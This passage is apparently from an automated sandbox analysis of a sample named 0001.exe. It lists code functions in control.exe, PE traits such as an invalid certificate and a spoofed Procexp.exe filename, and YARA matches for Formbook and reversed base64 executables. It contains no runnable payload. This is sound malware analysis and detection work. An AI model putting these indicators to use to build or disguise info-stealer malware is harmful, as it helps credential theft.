          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049EF90014_2_049EF900
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB22AE14_2_04AB22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA4AEF14_2_04AA4AEF
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A9FA2B14_2_04A9FA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0B23614_2_04A0B236
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1EBB014_2_04A1EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1138B14_2_04A1138B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0EB9A14_2_04A0EB9A
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A923E314_2_04A923E3
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA03DA14_2_04AA03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AADBD214_2_04AADBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1ABD814_2_04A1ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2B2814_2_04AB2B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0A30914_2_04A0A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA231B14_2_04AA231B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0AB4014_2_04A0AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A8CB4F14_2_04A8CB4F
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BDA5E14_2_007BDA5E
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BCA4614_2_007BCA46
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BD4B314_2_007BD4B3
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A2D9014_2_007A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BD7F914_2_007BD7F9
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BDFE614_2_007BDFE6
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A2FB014_2_007A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A9F8014_2_007A9F80
Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 049EB150 appears 145 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 04CFB150 appears 145 times
Source: 0001.exe | Static PE information: invalid certificate
Source: 0001.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 0001.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0001.exe, 00000000.00000000.231077348.00000000004B1000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameProcexp.exeB vs 0001.exe
Source: 0001.exe | Binary or memory string: OriginalFilenameProcexp.exeB vs 0001.exe
Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.243293381.000000000434C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000003.243344552.000000000434C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000003.234141270.000000000434C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000003.243422132.000000000434C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000003.233441709.00000000042D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.234084975.000000000434C000.00000004.00000001.sdmp, type: MEMORY